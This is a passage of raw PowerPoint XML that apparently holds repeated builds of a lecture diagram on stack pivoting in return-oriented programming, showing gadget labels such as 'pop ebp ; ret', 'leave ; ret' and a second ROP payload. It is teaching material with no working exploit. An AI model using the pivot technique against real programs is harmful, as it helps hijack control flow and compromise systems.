            <a:off x="2545625" y="1333150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ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1805" name="Shape 1805"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1430950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1806" name="Shape 1806"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1801" idx="1"/>
            <a:endCxn id="1803" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4796025" y="3714725"/>
            <a:ext cx="13275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7" name="Shape 1807"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667000" y="1249000"/>
            <a:ext cx="404400" cy="572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8" name="Shape 1808"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1807" idx="1"/>
            <a:endCxn id="1804" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4795800" y="1535350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9" name="Shape 1809"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047380" y="3840775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810" name="Shape 1810"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720330" y="3994375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1" name="Shape 1811"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="4362725"/>
            <a:ext cx="2250300" cy="404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stack overflow; ret;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12" name="Shape 1812"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1811" idx="0"/>
            <a:endCxn id="1803" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3670775" y="3871025"/>
            <a:ext cx="0" cy="4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3" name="Shape 1813"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704625" y="2400552"/>
            <a:ext cx="15714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mov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esp, ebp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pop   ebp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4" name="Shape 1814"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545350" y="2449152"/>
            <a:ext cx="22503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leave ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1815" name="Shape 1815"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="2316402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ret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1816" name="Shape 1816"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1803" idx="0"/>
            <a:endCxn id="1814" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3670475" y="2756450"/>
            <a:ext cx="300" cy="8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7" name="Shape 1817"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1815" idx="1"/>
            <a:endCxn id="1814" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4795675" y="2602752"/>
            <a:ext cx="1327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8" name="Shape 1818"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400325" y="2488752"/>
            <a:ext cx="93300" cy="21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Shape 1819"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="2865075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stack addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1820" name="Shape 1820"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833225" y="2956525"/>
            <a:ext cx="2250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ebp = new stack addr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21" name="Shape 1821"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1814" idx="0"/>
            <a:endCxn id="1804" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3670500" y="1737552"/>
            <a:ext cx="300" cy="7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2" name="Shape 1822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123525" y="1648750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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1823" name="Shape 1823"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1224338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N</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1824" name="Shape 1824"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8067600" y="1623544"/>
            <a:ext cx="6366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stack addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1825" name="Shape 1825"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7694875" y="2083144"/>
            <a:ext cx="3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pivot: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1831" name="Shape 1831"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123525" y="3428375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ebp ret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1832" name="Shape 1832"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="3563750"/>
            <a:ext cx="2250300" cy="30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pop ebp ; ret ;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833" name="Shape 1833"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1831" idx="1"/>
            <a:endCxn id="1832" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4796025" y="3714725"/>
            <a:ext cx="13275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4" name="Shape 1834"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047380" y="2708145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835" name="Shape 1835"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720330" y="2861745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6" name="Shape 1836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="4362725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 overflow; ret;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37" name="Shape 1837"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1836" idx="0"/>
            <a:endCxn id="1832" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3670775" y="3871025"/>
            <a:ext cx="0" cy="4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8" name="Shape 1838"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704625" y="2400552"/>
            <a:ext cx="15714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mov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esp, ebp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pop   ebp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9" name="Shape 1839"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545350" y="2449152"/>
            <a:ext cx="22503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leave ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1840" name="Shape 1840"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="2316402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ret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1841" name="Shape 1841"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1832" idx="0"/>
            <a:endCxn id="1839" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3670475" y="2756450"/>
            <a:ext cx="300" cy="8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2" name="Shape 1842"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1840" idx="1"/>
            <a:endCxn id="1839" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4795675" y="2602752"/>
            <a:ext cx="1327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3" name="Shape 1843"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400325" y="2488752"/>
            <a:ext cx="93300" cy="21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Shape 1844"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="2865075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stack addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1845" name="Shape 1845"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833225" y="2956525"/>
            <a:ext cx="2250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ebp = new stack addr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6" name="Shape 1846"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1839" idx="0"/>
            <a:endCxn id="1847" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3670500" y="1737552"/>
            <a:ext cx="300" cy="7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8" name="Shape 1848"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1866550"/>
            <a:ext cx="1571400" cy="21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ebp value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1847" name="Shape 1847"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="1333150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ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1849" name="Shape 1849"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1430950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850" name="Shape 1850"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667000" y="1249000"/>
            <a:ext cx="404400" cy="572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1" name="Shape 1851"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1850" idx="1"/>
            <a:endCxn id="1847" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4795800" y="1535350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2" name="Shape 1852"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123525" y="1648750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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1853" name="Shape 1853"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1224338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N</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1854" name="Shape 1854"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8067600" y="1623544"/>
            <a:ext cx="6366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stack addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1855" name="Shape 1855"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7694875" y="2083144"/>
            <a:ext cx="3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Shape 18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pivot: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1861" name="Shape 1861"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123525" y="3428375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ebp ret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1862" name="Shape 1862"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="3563750"/>
            <a:ext cx="22503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 ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1863" name="Shape 1863"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1861" idx="1"/>
            <a:endCxn id="1862" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4796025" y="3714725"/>
            <a:ext cx="13275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4" name="Shape 1864"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047380" y="1925405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865" name="Shape 1865"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720330" y="2079005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6" name="Shape 1866"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="4362725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 overflow; ret;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7" name="Shape 1867"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1866" idx="0"/>
            <a:endCxn id="1862" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3670775" y="3871025"/>
            <a:ext cx="0" cy="4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8" name="Shape 1868"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704625" y="2400552"/>
            <a:ext cx="15714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mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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pop   ebp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9" name="Shape 1869"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545350" y="2449152"/>
            <a:ext cx="22503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leave ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1870" name="Shape 1870"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="2316402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ret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1871" name="Shape 1871"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1862" idx="0"/>
            <a:endCxn id="1869" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3670475" y="2756450"/>
            <a:ext cx="300" cy="8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2" name="Shape 1872"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1870" idx="1"/>
            <a:endCxn id="1869" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4795675" y="2602752"/>
            <a:ext cx="1327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3" name="Shape 1873"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400325" y="2488752"/>
            <a:ext cx="93300" cy="21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Shape 1874"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="2865075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stack addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1875" name="Shape 1875"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833225" y="2956525"/>
            <a:ext cx="2250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ebp = new stack addr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76" name="Shape 1876"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1869" idx="0"/>
            <a:endCxn id="1877" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3670500" y="1737552"/>
            <a:ext cx="300" cy="7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8" name="Shape 1878"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1866550"/>
            <a:ext cx="1571400" cy="21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ebp value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1877" name="Shape 1877"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="1333150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ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1879" name="Shape 1879"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1430950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880" name="Shape 1880"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667000" y="1249000"/>
            <a:ext cx="404400" cy="572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1" name="Shape 1881"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1880" idx="1"/>
            <a:endCxn id="1877" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4795800" y="1535350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2" name="Shape 1882"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123525" y="1648750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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1883" name="Shape 1883"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1224338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N</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1884" name="Shape 1884"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8067600" y="1623544"/>
            <a:ext cx="6366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stack addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1885" name="Shape 1885"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7694875" y="2083144"/>
            <a:ext cx="3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6" name="Shape 1886"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3860300" y="2065473"/>
            <a:ext cx="2250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esp = new stack addr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Shape 18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pivot: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1892" name="Shape 1892"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123525" y="3428375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ebp ret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1893" name="Shape 1893"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="3563750"/>
            <a:ext cx="22503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 ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1894" name="Shape 1894"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1892" idx="1"/>
            <a:endCxn id="1893" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4796025" y="3714725"/>
            <a:ext cx="13275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5" name="Shape 1895"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047380" y="1707175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896" name="Shape 1896"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720330" y="1860775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7" name="Shape 1897"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="4362725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 overflow; ret;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98" name="Shape 1898"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1897" idx="0"/>
            <a:endCxn id="1893" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3670775" y="3871025"/>
            <a:ext cx="0" cy="4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9" name="Shape 1899"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704625" y="2400552"/>
            <a:ext cx="15714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mov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esp, ebp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pop   ebp</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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0" name="Shape 1900"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545350" y="2449152"/>
            <a:ext cx="22503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leave ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1901" name="Shape 1901"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="2316402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ret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1902" name="Shape 1902"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1893" idx="0"/>
            <a:endCxn id="1900" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3670475" y="2756450"/>
            <a:ext cx="300" cy="8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3" name="Shape 1903"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1901" idx="1"/>
            <a:endCxn id="1900" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4795675" y="2602752"/>
            <a:ext cx="1327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4" name="Shape 1904"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400325" y="2488752"/>
            <a:ext cx="93300" cy="21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Shape 1905"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="2865075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stack addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1906" name="Shape 1906"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833225" y="2956525"/>
            <a:ext cx="2250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ebp = new stack addr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7" name="Shape 1907"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1900" idx="0"/>
            <a:endCxn id="1908" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3670500" y="1737552"/>
            <a:ext cx="300" cy="7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9" name="Shape 1909"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1866550"/>
            <a:ext cx="1571400" cy="21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ebp value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1908" name="Shape 1908"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="1333150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ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1910" name="Shape 1910"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1430950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911" name="Shape 1911"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667000" y="1249000"/>
            <a:ext cx="404400" cy="572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2" name="Shape 1912"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1911" idx="1"/>
            <a:endCxn id="1908" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4795800" y="1535350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3" name="Shape 1913"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123525" y="1648750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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1914" name="Shape 1914"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1224338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N</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1915" name="Shape 1915"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8067600" y="1623544"/>
            <a:ext cx="6366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stack addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1916" name="Shape 1916"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
